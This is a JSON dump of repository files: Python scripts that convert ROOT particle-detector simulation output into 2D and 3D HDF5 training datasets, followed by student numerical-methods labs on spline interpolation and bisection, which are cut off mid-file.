[ { "alpha_fraction": 0.6911764740943909, "alphanum_fraction": 0.7426470518112183, "avg_line_length": 33, "blob_id": "160490d64a3b75af9513d76a7f6caae84af28515", "content_id": "09593daf01f8880b5bcb97770935ee18c8431319", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 136, "license_type": "no_license", "max_line_length": 93, "num_lines": 4, "path": "/README.md", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "# DLTool\n3D/2D h5 files\n####How to Run###\npython ProcessRootFile_WireCell.py /input-directory-of-root-files/ output-2d-H5 output-3d-H5\n" }, { "alpha_fraction": 0.5910722017288208, "alphanum_fraction": 0.6294302344322205, "avg_line_length": 22.712766647338867, "blob_id": "875a293fc40a4948424abf3fe09af71b9d68c68b", "content_id": "0f92d34d8b267ad9a82ca03fc88e26fcdedc2bb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4458, "license_type": "no_license", "max_line_length": 133, "num_lines": 188, "path": "/ProcessRootFile_WireCell.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "import time\nimport ROOT\nimport rootpy\nimport root_numpy\nimport numpy\nimport math\nimport sys\nimport os\nimport glob\nfrom SparseTensorDataSet import *\n\nfrom scipy import misc as m\nfrom WireDataUtils import *\nfrom subprocess import call\nimport multiprocessing \n\ndef preprocess(X):\n return X[:2,:,0:4096] \n\ndef ProcessEvents(NEvents,infile,outfile2D,outfile3D,Offset=0):\n \n bins3D=[240,240,4096]\n #bins2D=[480,4096]\n\n # ReadEvents\n f=ROOT.TFile(infile)\n t=f.Get(\"wiredump/anatree\")\n if NEvents<=0:\n NEvents=t.GetEntries()\n \n EventList=range(0,NEvents)\n\n\n #Read one event.\n [example,Attributes]=ReadADCWire(t,[EventList[0]],NPlanes=2,samples=4500)\n\n X=preprocess(example[0])\n image_shape= X.shape\n assert image_shape == (2, 240, 4096)\n\n dtype = 'float16' # 'float16' # Half-precision should be enough.\n compression = 'gzip' #'gzip'\n chunksize = 1 # We use chunksize=1 because we don't know how many events are in src file.\n chunkshape = (chunksize,) + image_shape\n\n h5FileName2D=outfile2D\n h5out2D= h5py.File(h5FileName2D+\".2d.h5\",\"w\")\n h5FileName3D=outfile3D\n #h5out3D= h5py.File(h5FileName3D+\".3d.h5\",\"w\")\n \n #file to save 3D images\n #fileout3D=os.path.basename(infile)+\".3d.h5\"\n f_3D=open_file(h5FileName3D+\".3d.h5\",\"w\")\n #images3D.Writeh5(h5out3D,\"images3D\")\n #f.close()\n \n\n N=len(EventList)\n \n # Initialize data sets.\n dsets = {}\n\n # Each event contains the following attributes.\n attributes = Attributes[0].keys()\n for attr in attributes:\n \n dsets[attr] = h5out2D.create_dataset(attr, (N,), dtype='float32')\n\n # Each event is an image of image_shape.\n dsets['features'] = h5out2D.create_dataset('features', (N,)+image_shape, chunks=chunkshape, dtype=dtype, compression=compression)\n #getting 3D sparse matrix for 3D imaging\n images3D=SparseTensorDataSet(bins3D,unbinned=True)\n \n for EventI in xrange(0,N):\n \n [events,Attributes]=ReadADCWire(t,[EventList[EventI]],NPlanes=2,samples=4500)\n \n event=events[0]\n dsets['features'][EventI] = preprocess(event)\n\n for attr in Attributes[0]:\n dsets[attr][EventI] = Attributes[0][attr]\n \n images3D.C.append(np.array([t.simide_x,t.simide_y,t.simide_z]).transpose())\n images3D.V.append(np.array(t.simide_numElectrons))\n \n Cs=[]\n Vs=[]\n MaxSamples=4096\n\n images3D.Writeh5(f_3D,\"images3D\")\n\n f.Close()\n\n h5out2D.close()\n f_3D.close()\n #h5out3D.close()\n\n return True\n\n\n################################################### \n\nInputDir=sys.argv[1]\n\nif len(sys.argv)>2:\n OutputDir2D=sys.argv[2]\nelse:\n OutputDir2D=\"./\"\n\nif OutputDir2D[:-1]!=\"/\":\n OutputDir2D=OutputDir2D+\"/\"\n\nif len(sys.argv)>3:\n OutputDir3D=sys.argv[3]\nelse:\n OutputDir3D=\"./\"\n\nif OutputDir3D[:-1]!=\"/\":\n OutputDir3D=OutputDir3D+\"/\"\n\n\nprint \"Reading Directory:\",InputDir\nprint \"Output Dir 2d:\", OutputDir2D\nprint \"Output Dir 3d:\", OutputDir3D\n\n#Make the directories\n\nif not os.path.exists(OutputDir2D):\n os.makedirs(OutputDir2D)\nif not os.path.exists(OutputDir3D):\n os.makedirs(OutputDir3D)\n\nOffset=0\n\nif len(sys.argv)>4:\n Offset=max(long(sys.argv[4]),Offset)\n\nNEvents=0\n\nif len(sys.argv)>4:\n if long(sys.argv[4])>0:\n NEvents=long(sys.argv[4])\n\nprint \"NEvents per file: \",NEvents\nprint \"Offset: \",Offset\n\nfiles = glob.glob(InputDir + '/*/*/WireDump_*.root')\nprint 'Found %d files.' % len(files)\n\n\ndef wrapper(filename):\n basename = os.path.basename(filename)\n fout = '/' + basename.split(\".\")[-2]\n fout = fout.split(\"_\")[-1]\n # Construct name from Docker Subdirectories\n dockername = filename.split(\"/\")[-2]\n particlename = filename.split(\"/\")[-3]\n fout2d = OutputDir2D +particlename+\"_\"+fout + \"-\" + dockername\n fout3d = OutputDir3D +particlename+\"_\"+fout + \"-\" + dockername\n\n\n print \"2D File: \",fout2d, \"3D File: \",fout3d\n \n if not os.path.isfile(fout+\".h5\"):\n output=ProcessEvents(NEvents,filename,fout2d,fout3d,\n Offset=Offset)\n pass\n else:\n print \"Exists. Skipping.\",\n\n print \"Done.\"\n return\n\nnum_threads=20\n\n#wrapper(files[0])\n\ntic = time.clock()\ntry:\n pool = multiprocessing.Pool(num_threads)\n pool.map(wrapper, files)\nexcept:\n print \"Error\"\nfinally:\n pool.close()\n pool.join()\nprint time.clock() - tic\n" }, { "alpha_fraction": 0.5269439220428467, "alphanum_fraction": 0.5362942814826965, "avg_line_length": 27.921709060668945, "blob_id": "998901c93c0bf071a8d59d8349a448373bba7238", "content_id": "965febfcbc1bca210a290e19984fdef53445ea42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8128, "license_type": "no_license", "max_line_length": 127, "num_lines": 281, "path": "/SparseTensorDataSet.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "from SparseNDArray import *\nfrom tables import *\nfrom scipy.sparse import find\nimport numpy as np\nimport h5py\n\nclass SparseTensorDataSet:\n def __init__(self,shape=(), default=0, unbinned=False,dtype=\"float32\"):\n self.unbinned=unbinned\n self.shape=tuple(shape)\n self.__default = default #default value of non-assigned elements\n self.ndim = len(shape)\n self.dtype = dtype\n self.C = [] # This will hold the sparse ND arrays\n self.V = [] # This will hold the sparse ND arrays\n\n def append(self,Coordinates,Values):\n Cs=[]\n Vs=[]\n \n for C,V in zip(Coordinates,Values):\n Cs.append(tuple(C))\n Vs.append(V)\n \n self.C.append(Cs)\n self.V.append(Vs)\n\n def convertToBinned(self):\n ## Not completed... need to flatten, use find, and unflatten, and store in self.C,self.V. Requires reindexing.\n N=self.len()\n\n for i in xrange(B):\n out,binedges=self.histogram(i,bins)\n find(out)\n\n self.binedges=binedges\n \n \n def sparse(self,i):\n a=sparray(self.shape,default=self.__default, dtype=self.dtype)\n\n for C,V in zip(self.C[i],self.V[i]):\n a[C]=V\n\n return a\n\n def histogram(self,i,bins=False):\n if not (isinstance(bins,list) or isinstance(bins,tuple) ):\n bins=self.shape\n # returns histogram and bin edges\n return np.histogramdd(self.C[i],bins=list(bins),weights=self.V[i])\n\n def histogramAll(self,range=False,bins=False):\n if not (isinstance(bins,list) or isinstance(bins,tuple) ):\n bins=self.shape\n if range:\n N=range[1]-range[0]\n else:\n N=self.len()\n out=np.zeros((N,)+tuple(bins))\n\n if not range:\n range=xrange(N)\n else:\n range=xrange(range[0],range[1])\n\n for i in range:\n out[i],binedges=self.histogram(i,bins)\n \n return out,binedges\n \n # This only makes sense if the coordinates are integers\n def dense(self,i):\n if self.unbinned:\n return self.histogram(i)[0]\n \n a=np.zeros((1,)+self.shape,dtype=self.dtype)\n\n for C,V in zip(self.C[i],self.V[i]):\n a[tuple(C)]=V\n\n return a\n\n def denseAll(self,range=[]):\n if self.unbinned:\n return self.histogramAll(range)[0]\n\n if len(range)>0:\n Start=range[0]\n Stop=range[1]\n else:\n Start=0\n Stop=len(self.C)\n\n a=np.zeros((Stop-Start,)+tuple(self.shape),dtype=self.dtype)\n \n for i in xrange(Start,Stop):\n for C,V in zip(self.C[i],self.V[i]):\n try:\n a[i-Start][tuple(C)]=V\n except:\n print \"Reached End of Sample.\"\n\n return a\n \n \n def Writeh5(self,h5file,name,range=[]):\n root = h5file.create_group(\"/\",name,name)\n FILTERS = Filters(complib='zlib', complevel=5)\n\n if self.unbinned:\n CT=h5file.create_vlarray(root,\"C\", Float32Atom(shape=len(self.shape)),\"\",filters=FILTERS)\n else:\n CT=h5file.create_vlarray(root,\"C\", Int32Atom(shape=len(self.shape)),\"\",filters=FILTERS)\n VT=h5file.create_vlarray(root,\"V\", Float32Atom(),\"\",filters=FILTERS) \n h5file.create_array(root,\"shape\",self.shape)\n h5file.create_array(root,\"unbinned\",[int(self.unbinned)])\n \n if len(range)>0:\n Start=range[0]\n Stop=range[1]\n else:\n Start=0\n Stop=len(self.C)\n\n for i in xrange(Start,Stop):\n CT.append(self.C[i])\n VT.append(self.V[i])\n\n def Readh5(self,f,name,range=[]):\n self.shape=np.array(f[name][\"shape\"])\n self.unbinned=bool(f[name][\"unbinned\"][0])\n if len(range)>0:\n Start=range[0]\n Stop=range[1]\n self.C=f[name][\"C\"][Start:Stop]\n self.V=f[name][\"V\"][Start:Stop]\n\n else:\n self.C=f[name][\"C\"]\n self.V=f[name][\"V\"]\n\n def Readh5Files(self,filelist,name):\n for filename in filelist:\n f=h5py.File(filename,\"r\")\n self.shape=np.array(f[name][\"shape\"])\n\n try:\n self.C=np.concatenate(self.C,f[name][\"C\"])\n # self.V=np.concatenate(self.V,f[name][\"V\"])\n self.V+=list(self.V,f[name][\"V\"])\n except:\n self.C=np.array(f[name][\"C\"])\n self.V=list(f[name][\"V\"])\n f.close()\n\n def Readh5Files2(self,filelist,name):\n for filename in filelist:\n f=h5py.File(filename,\"r\")\n self.shape=np.array(f[name][\"shape\"])\n\n try:\n self.C=f[name][\"C\"]\n # self.V=np.concatenate(self.V,f[name][\"V\"])\n self.V+=f[name][\"V\"]\n except:\n self.C=np.array(f[name][\"C\"])\n self.V=list(f[name][\"V\"])\n f.close()\n\n \n def FromDense(self,A,Clear=False):\n if Clear:\n self.C=[]\n self.V=[]\n for a in A:\n X,Y,V=find(a)\n C=np.array([X,Y])\n C=C.transpose()\n \n self.C.append(tuple(C))\n self.V.append(V)\n\n def AppendFromDense(self,a):\n\n X,Y,V=find(a)\n C=np.array([X,Y])\n C=C.transpose()\n \n self.C.append(tuple(C))\n self.V.append(V)\n\n\n \n def len(self):\n try:\n N=len(self.C)\n except:\n N=self.C.shape[0]\n return N\n\n \n def DenseGenerator(self,BatchSize,Wrap=True):\n Done=False\n N=self.len()\n while not Done:\n for i in xrange(0,N-BatchSize,BatchSize): # May miss some Examples at end of file... need better logic\n yield self.denseAll([i,i+BatchSize])\n Done=not Wrap\n \nif __name__ == '__main__':\n # Main\n import h5py\n import time\n\n shape=(10000,10,360)\n density=0.1\n batchsize=100\n \n N_Examples=shape[0]\n N_Vals=np.prod(shape)\n \n print \"Testing with tensor size\", shape, \" and density\",density,\".\"\n\n # Generate Some Sparse Data\n start=time.time()\n Vals=np.array(np.random.random(int(N_Vals*density)),dtype=\"float32\")\n Zs=np.zeros(N_Vals-Vals.shape[0],dtype=\"float32\")\n Train_X=np.concatenate((Vals,Zs))\n np.random.shuffle(Train_X)\n Train_X=Train_X.reshape(shape)\n print \"Time Generate Sparse Data (into a Dense Tensor):\",time.time()-start\n\n # Now Create the sparse \"Tensor\"\n X=SparseTensorDataSet(Train_X.shape[1:])\n \n # Test making the data sparse. (Only works for 2d right now)\n start=time.time()\n X.FromDense(Train_X)\n print \"Time to convert to Sparse:\",time.time()-start\n\n print \"Sparsity Achieved: \",float(sum(map(len,X.C)))/N_Vals\n\n # Write to File\n start=time.time()\n f=open_file(\"TestOut.h5\",\"w\")\n X.Writeh5(f,\"Data\")\n f.close()\n print \"Time to write out:\",time.time()-start\n \n # Read back\n start=time.time()\n XX=SparseTensorDataSet(Train_X.shape[1:])\n f=h5py.File(\"TestOut.h5\",\"r\")\n XX.Readh5(f,\"Data\")\n f.close()\n print \"Time to read back:\",time.time()-start\n \n # Try to reconstruct the original data\n start=time.time()\n XXX=XX.denseAll()\n print \"Time to convert to Dense:\",time.time()-start\n \n # Test\n print\n NValues=np.prod(Train_X.shape)\n T=Train_X==XXX\n NGood=np.sum(T)\n print \"Number of non-matching values\",NValues-NGood ,\"/\",NValues\n\n print \"The Difference:\"\n print XXX[np.where(T==False)]-Train_X[np.where(T==False)]\n print \"Average difference of mismatch terms:\", np.sum( XXX[np.where(T==False)]-Train_X[np.where(T==False)])/(NValues-NGood)\n\n start=time.time()\n print \"Generator batchsize:\",batchsize\n for D in XX.DenseGenerator(batchsize,False):\n print \".\",\n\n print\n print \"Time to run generator:\",time.time()-start\n\n" }, { "alpha_fraction": 0.5505473017692566, "alphanum_fraction": 0.5676110982894897, "avg_line_length": 28.81730842590332, "blob_id": "08ae34e06f959e43b5b73b8375aefc1da38fcea5", "content_id": "435f970dda7f38e6ce9321a36c997f07fd0a79ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3106, "license_type": "no_license", "max_line_length": 136, "num_lines": 104, "path": "/WireDataUtils.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "import numpy\nimport numpy as np\nimport h5py\nimport math\nimport ROOT\n\ndef DownSample(Data,factor,Nx,Ny,sumabs=False):\n if factor==0:\n return np.reshape(Data,[Nx,Ny]),Ny\n\n # Remove entries at the end so Down Sampling works\n NyNew=Ny-Ny%factor\n Data1=np.reshape(Data,[Nx,Ny])[:,0:NyNew]\n \n # DownSample \n if sumabs:\n a=abs(Data1.reshape([Nx*NyNew/factor,factor])).sum(axis=1).reshape([Nx,NyNew/factor])\n else:\n a=Data1.reshape([Nx*NyNew/factor,factor]).sum(axis=1).reshape([Nx,NyNew/factor])\n\n return a,NyNew\n\ndef GetXWindow(Data,i,BoxSizeX):\n return Data[:,i:i+BoxSizeX]\n\n\ndef ScanWindow(Data,BoxSizeX=256,Nx=240,Ny=4096):\n\n NyNew=Ny\n #Scan the Window\n b=np.array([0]*(NyNew-BoxSizeX))\n\n for i in xrange(0,NyNew-BoxSizeX):\n b[i]=GetXWindow(Data,i,BoxSizeX).clip(0,99999999999).sum()\n\n #Find the Window with max Energy/Charge\n BoxStart=b.argmax()\n MaxSum=b[BoxStart]\n\n #Store the window\n Box=Data[:,BoxStart:BoxStart+BoxSizeX]\n\n return Box,BoxStart,MaxSum\n\n\ndef ReadADCWire(t,EventList=[0],NPlanes=2,samples=4500):\n\n Events=[]\n Attributes=[]\n\n for NEvent in EventList:\n\n if (NEvent>-1):\n t.GetEntry(NEvent)\n\n x=numpy.array(t.WireADC)\n a_size = t.geant_list_size \n #print a_size\n if NPlanes<3:\n y=numpy.pad(x,(0,t.nWires/NPlanes*samples),mode='constant')\n else:\n y=x\n\n z=numpy.reshape(y,[NPlanes+1,t.nWires/NPlanes,samples])\n Events+=[z]\n #Creat Dictionary\n AA={}\n\t#getting information for the line equation\n #print \"out\"\n# print numpy.array(t.StartPointx)[0]\n #if (numpy.array(t.process_primary)[a_size] == 0) and (numpy.array(t.pdg)[a_size] == 11 or numpy.array(t.pdg)[a_size] == 13)\n for PrimaryI in xrange(0,a_size):\n if t.process_primary[PrimaryI]==1:\n break\n\n #print \"PrimaryI:\", PrimaryI\n \n #print \"xi \",xi\n\n # [xi,yi,zi]= [t.StartPointx[PrimaryI]-t.EndPointx[PrimaryI],\n # t.StartPointy[PrimaryI]-t.EndPointy[PrimaryI],\n # t.StartPointz[PrimaryI]-t.EndPointz[PrimaryI]]\n \n AA[\"Track_length\"]= numpy.array(t.Track_length)[PrimaryI] #<---- here is now computed in WireDump\n AA[\"pdg\"] = numpy.array(t.pdg)[PrimaryI]\n AA[\"Eng\"] = numpy.array(t.Eng)[PrimaryI]\n AA[\"Px\"] = numpy.array(t.Px)[PrimaryI]\n AA[\"Py\"] = numpy.array(t.Py)[PrimaryI]\n AA[\"Pz\"] = numpy.array(t.Pz)[PrimaryI] \n#Creat Dictionary\n #AA={}\n\n# AA[\"Foo\"]=t.bar\n\t AA[\"enu_truth\"]=numpy.array(t.enu_truth)\n AA[\"lep_mom_truth\"]=numpy.array(t.lep_mom_truth)\n AA[\"mode_truth\"]=numpy.array(t.mode_truth)\n #AA[\"Track_length\"]=math.sqrt(math.pow((xs-x_i),2)+math.pow((ys-y_i),2)+math.pow((zs-z_i),2))\n Attributes+=[AA]\n\n return [Events,Attributes]\n\n\n\n#def LineEquation_point(\n\n\n\n \n" }, { "alpha_fraction": 0.5191272497177124, "alphanum_fraction": 0.5627656579017639, "avg_line_length": 26.34883689880371, "blob_id": "2c08bde183d1e70325e4d11f9346f9110561aa4c", "content_id": "137e42db68e449ceb81dc7dd0d7b613631aa4e09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3529, "license_type": "no_license", "max_line_length": 134, "num_lines": 129, "path": "/ProcessWireCell.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "from ROOT import *\nfrom root_numpy import hist2array\nfrom SparseTensorDataSet import *\nimport os,sys\n\ndef Plot3DTrack(X,Y,Z,V):\n import matplotlib.pyplot as plt\n import plotly.plotly as py\n from mpl_toolkits.mplot3d import Axes3D\n\n fig = plt.figure()\n fig,ax = fig.add_subplot(111, projection='3d')\n ax.scatter(X,Y,Z,c=V)\n fig.show()\n return ax\n\ndef PlotSparseTensor(T,i):\n return Plot3DTrack(T.C[i][0:100,0],\n T.C[i][0:100,1],\n T.C[i][0:100,2],\n T.V[i][0:100])\n\n\ndef ProcessRootFile(filein=\"WireDump_3D_electron_1462146937.root\",fileout=False,N_Max=-1,Sparse2D=False):\n Rf=TFile.Open(filein)\n t=Rf.Get(\"wiredump/anatree\")\n\n bins3D=[240,240,4096]\n bins2D=[480,4096]\n\n N=t.GetEntries()\n \n if N_Max>0:\n N=min(N,N_Max)\n\n images3D=SparseTensorDataSet(bins3D,unbinned=True)\n if Sparse2D:\n images2D=SparseTensorDataSet(bins2D,unbinned=False)\n else:\n d=np.zeros((N,480,4096))\n \n for i in xrange(N):\n t.GetEntry(i)\n print i,\",\",\n sys.stdout.flush()\n\n images3D.C.append(np.array([t.simide_x,t.simide_y,t.simide_z]).transpose())\n images3D.V.append(np.array(t.simide_numElectrons))\n\n Cs=[]\n Vs=[]\n\n MaxSamples=4096\n\n # if Sparse2D:\n # d=np.zeros((t.raw_nChannel,MaxSamples))\n # for j in xrange(t.raw_nChannel):\n # h=t.raw_wf[j]\n # d[j]=hist2array(h)[:MaxSamples]\n\n # images2D.AppendFromDense(d)\n # else:\n # for j in xrange(t.raw_nChannel):\n # h=t.raw_wf[j]\n # d[i][j]=hist2array(h)[:MaxSamples]\n\n if not fileout:\n fileout2D=os.path.basename(filein)+\".2d.h5\"\n fileout3D=os.path.basename(filein)+\".3d.h5\"\n\n if Sparse2D:\n f=open_file(fileout2D,\"w\")\n images2D.Writeh5(f,\"images2D\")\n f.close()\n else:\n f=h5py.File(fileout2D,\"w\")\n dset = f.create_dataset(\"images2D\", (N,480,4096),compression=\"gzip\")\n dset[...]=d\n f.close()\n \n f=open_file(fileout3D,\"w\")\n images3D.Writeh5(f,\"images3D\")\n f.close()\n\n #return t,Rf,images2D,images3D\n\nif __name__ == '__main__':\n # Main\n\n t=ProcessRootFile(Sparse2D=False,N_Max=10)\n \n #PlotSparseTensor(images,2)\n\n\n images3D=SparseTensorDataSet()\n \n # f=h5py.File(\"celltree_SimChannel_Raw.root.3d.h5\",\"r\")\n # images3D.Readh5(f,\"images3D\")\n # f.close()\n #images2D=SparseTensorDataSet()\n #f=h5py.File(\"celltree_SimChannel_Raw.root.2d.h5\",\"r\")\n #images2D.Readh5(f,\"images2D\")\n # f.close()\n\n\n# f=h5py.File(\"celltree_SimChannel_Raw.root.2d.h5\",\"r\")\n# images2D=np.array(f[\"images2D\"])\n# f.close()\n\n # hAll1=images1.histogramAll()\n \n # NValues=np.prod(images.shape)*images.len()\n # T=hAll[0]==hAll1[0]\n # NGood=np.sum(T)\n # print \"Number of non-matching values\",NValues-NGood ,\"/\",NValues\n\n # print \"The Difference:\"\n # print hAll[0][np.where(T==False)]-hAll1[0][np.where(T==False)]\n # print \"Average difference of mismatch terms:\", np.sum( hAll[0][np.where(T==False)]-hAll1[0][np.where(T==False)])/(NValues-NGood)\n\n\n # for k in xrange(0,4096): #h.GetNbinsX()+1):\n# V=h.GetBinContent(k+1)\n# if V!=0.:\n# Cs.append((j,k))\n # Vs.append(V)\n\n# images2D.C.append(np.array(Cs))\n# images2D.V.append(np.array(Vs))\n\n" }, { "alpha_fraction": 0.603939414024353, "alphanum_fraction": 0.625151515007019, "avg_line_length": 22.076923370361328, "blob_id": "676fdfa3f0e71f7c464f4b2c9a8649c981c448f7", "content_id": "c16e3915d6a8c45e58eab71cca8bf52ffc8fdc16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3300, "license_type": "no_license", "max_line_length": 131, "num_lines": 143, "path": "/ProcessRootFile.py", "repo_name": "UTA-HEP-Computing/DLTool", "src_encoding": "UTF-8", "text": "import time\nimport ROOT\nimport rootpy\nimport root_numpy\nimport numpy\nimport math\nimport sys\nimport os\nimport glob\n\nfrom scipy import misc as m\nfrom WireDataUtils import *\nfrom subprocess import call\nimport multiprocessing \n\ndef preprocess(X):\n return X[:2,:,0:4096] \n\ndef ProcessEvents(NEvents,infile,outfile,Offset=0):\n # ReadEvents\n f=ROOT.TFile(infile)\n t=f.Get(\"wiredump/anatree\")\n if NEvents<=0:\n NEvents=t.GetEntries()\n \n EventList=range(0,NEvents)\n\n #Read one event.\n [example,Attributes]=ReadADCWire(t,[EventList[0]],NPlanes=2,samples=4500)\n\n X=preprocess(example[0])\n image_shape= X.shape\n assert image_shape == (2, 240, 4096)\n\n dtype = 'float16' # 'float16' # Half-precision should be enough.\n compression = 'gzip' #'gzip'\n chunksize = 1 # We use chunksize=1 because we don't know how many events are in src file.\n chunkshape = (chunksize,) + image_shape\n\n h5FileName=outfile\n h5out= h5py.File(h5FileName+\".h5\",\"w\")\n N=len(EventList)\n \n # Initialize data sets.\n dsets = {}\n\n # Each event contains the following attributes.\n attributes = Attributes[0].keys()\n for attr in attributes:\n dsets[attr] = h5out.create_dataset(attr, (N,), dtype='float32')\n\n # Each event is an image of image_shape.\n dsets['features'] = h5out.create_dataset('features', (N,)+image_shape, chunks=chunkshape, dtype=dtype, compression=compression)\n \n for EventI in xrange(0,N): \n [events,Attributes]=ReadADCWire(t,[EventList[EventI]],NPlanes=2,samples=4500)\n \n event=events[0]\n dsets['features'][EventI] = preprocess(event)\n\n for attr in Attributes[0]:\n dsets[attr][EventI] = Attributes[0][attr]\n\n f.Close()\n\n h5out.close()\n\n return True\n\n\n################################################### \n\nInputDir=sys.argv[1]\n\nif len(sys.argv)>2:\n OutputDir=sys.argv[2]\nelse:\n OutputDir=\"./\"\n\nif OutputDir[:-1]!=\"/\":\n OutputDir=OutputDir+\"/\"\n\nprint \"Reading Directory:\",InputDir\nprint \"Output Dir:\", OutputDir\n\n#Make the directories\n\nif not os.path.exists(OutputDir):\n os.makedirs(OutputDir)\n\nOffset=0\n\nif len(sys.argv)>4:\n Offset=max(long(sys.argv[4]),Offset)\n\nNEvents=0\n\nif len(sys.argv)>3:\n if long(sys.argv[3])>0:\n NEvents=long(sys.argv[3])\n\nprint \"NEvents per file: \",NEvents\nprint \"Offset: \",Offset\n\nfiles = glob.glob(InputDir + '/*/*/wire_dump*.root')\nprint 'Found %d files.' % len(files)\n\n\ndef wrapper(filename):\n basename = os.path.basename(filename)\n fout = '/' + basename.split(\".\")[-2]\n fout = fout.split(\"_\")[-1]\n # Construct name from Docker Subdirectories\n dockername = filename.split(\"/\")[-2]\n particlename = filename.split(\"/\")[-3]\n fout = OutputDir +particlename+\"_\"+fout + \"-\" + dockername\n\n print fout,\n \n if not os.path.isfile(fout+\".h5\"): \n output=ProcessEvents(NEvents,filename,fout,\n Offset=Offset)\n pass\n else:\n print \"Exists. Skipping.\",\n\n print \"Done.\"\n return\n\nnum_threads=48\n\n#wrapper(files[0])\n\ntic = time.clock()\ntry:\n pool = multiprocessing.Pool(num_threads)\n pool.map(wrapper, files)\nexcept:\n print \"Error____\"\nfinally:\n pool.close()\n pool.join()\nprint time.clock() - tic\n" } ]
6
MrSkl1f/CA
https://github.com/MrSkl1f/CA
8af3750014971caffbd9fd51b9952073175186a7
27fd28a65499e7792881f980de04f34797f24326
d611ecb60c73ed61ec26ba943b0040076a0bb18f
refs/heads/master
2022-08-20T12:19:34.270532
2020-05-23T14:42:45
2020-05-23T14:42:45
263,736,493
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4944238066673279, "alphanum_fraction": 0.5183218121528625, "avg_line_length": 32.64285659790039, "blob_id": "9589ee20add78273cf54452460cfd876b370e768", "content_id": "0c156337e092faccced3de02bf3c2f0c6461a8ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, "license_type": "no_license", "max_line_length": 124, "num_lines": 56, "path": "/ThirdLab/3labMain.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "def f(x):\n return x ** 3\n\ndef get_table(xStart, step, amount):\n xMas = [xStart + step*i for i in range(amount)]\n yMas = [f(x) for x in xMas]\n return xMas, yMas\n\ndef interval(xMas, yMas, x):\n for i in range(1, len(xMas)):\n if xMas[i - 1] <= x < xMas[i]:\n return i\n return len(xMas)\n\ndef spline(xMas, yMas, step, xNeed): \n eta = [0, 0, 0]\n ksi = [0, 0, 0]\n\n # нахождение eta и ksi\n for i in range(2, len(xMas)):\n a = step\n b = -4 * step\n d = step\n f = -3 * ((yMas[i] - yMas[i - 1]) / step - (yMas[i - 1] - yMas[i - 2]) / step)\n eta.append(d / (b - a * eta[i]))\n ksi.append((a * ksi[i] + f) / (b - a * eta[i]))\n\n ci = [0] * (len(xMas) + 1)\n # определяем коэффы ci\n for i in range(len(xMas) - 1, 1, -1):\n ci[i] = eta[i + 1] * ci[i + 1] + ksi[i + 1]\n\n # определяем коэффы ai bi ci, получаем систему уравнений\n ai = [0 if i < 1 else yMas[i - 1] for i in range(len(xMas))]\n bi = [0 if i < 1 else ((yMas[i] - yMas[i - 1]) / step) - (step / 3 * (ci[i + 1] + 2 * ci[i])) for i in range(len(xMas))]\n di = [0 if i < 1 else (ci[i + 1] - ci[i]) / (3 * step) for i in range(len(xMas))]\n\n hi = xNeed - xMas[pos - 1]\n res = ai[pos] + bi[pos] * hi + ci[pos] * hi ** 2 + di[pos] * hi ** 3\n return res\n\nif __name__ == \"__main__\":\n xStart = float(input(\"Input beginning value of x: \"))\n xStep = float(input(\"Input step for x value: \"))\n xCount = int(input(\"Input amount of dots: \"))\n\n xMas, yMas = get_table(xStart, xStep, xCount)\n\n print(xMas, yMas)\n xNeed = float(input('Введите x > '))\n\n pos = interval(xMas, yMas, xNeed)\n res = spline(xMas, yMas, xStep, xNeed)\n print(\"Вычисленное значение f(x): {:.4f}\".format(res))\n print(\"Точное значение f(x): {:.4f}\".format(f(xNeed)))\n print(\"Погрешность: {:.2f}%\".format(10 * (1 - res / f(xNeed))))" }, { "alpha_fraction": 0.536203145980835, "alphanum_fraction": 0.5547550320625305, "avg_line_length": 32.04166793823242, "blob_id": "4ea89e3ea9d4244a2027c1337e59767bf7be133a", "content_id": "752fa8f9dec401585ad617519c74e482040a2b62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5960, "license_type": "no_license", "max_line_length": 116, "num_lines": 168, "path": "/FirstLab/FirstLab.py", "repo_name": "MrSkl1f/CA", "src_encoding": "UTF-8", "text": "import math\nfrom math import radians\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass HalfDivisionMethod:\n def __init__(self, a, b):\n self.eps = 1e-5\n self.a = a\n self.b = b\n \n def MPD(self):\n a = self.a\n b = self.b\n while abs(b - a) > self.eps:\n x = (a + b) / 2.0\n fx = func(x)\n fa = func(a)\n if (fx < 0 and fa < 0) or (fx > 0 and fa > 0):\n a = x\n else:\n b = x\n return x\n\nclass ConventionalInterpolation:\n def __init__(self, n, x, ArrForX, ArrForY):\n self.PolynomialDegree = n\n self.FindNum = x\n self.table = [ArrForX, ArrForY]\n\n def ModifyTable(self, table, n):\n for i in range(n):\n tmp = []\n for j in range(n-i):\n tmp.append((table[i+1][j] - table[i+1][j+1]) / (table[0][j] - table[0][i+j+1]))\n #print(table[0][j], table[0][i+j+1])\n table.append(tmp)\n return table\n\n def CreateIterval(self, n, x):\n MaxLength = len((self.table)[0])\n InderxNear = abs((self.table)[0][0] - x)\n for i in range(MaxLength):\n if abs((self.table)[0][i] - x) < InderxNear:\n InderxNear = abs((self.table)[0][i] - x)\n\n #InderxNear = min(range(MaxLength), key = lambda i: abs((self.table)[0][i] - x))\n SpaceInFirstTable = math.ceil(n / 2) \n \n if (InderxNear + SpaceInFirstTable + 1 > MaxLength): \n IndexForEnd = MaxLength\n IndexForStart = MaxLength - n\n elif (InderxNear < SpaceInFirstTable):\n IndexForStart = 0\n IndexForEnd = n\n else:\n IndexForStart = InderxNear - SpaceInFirstTable + 1\n 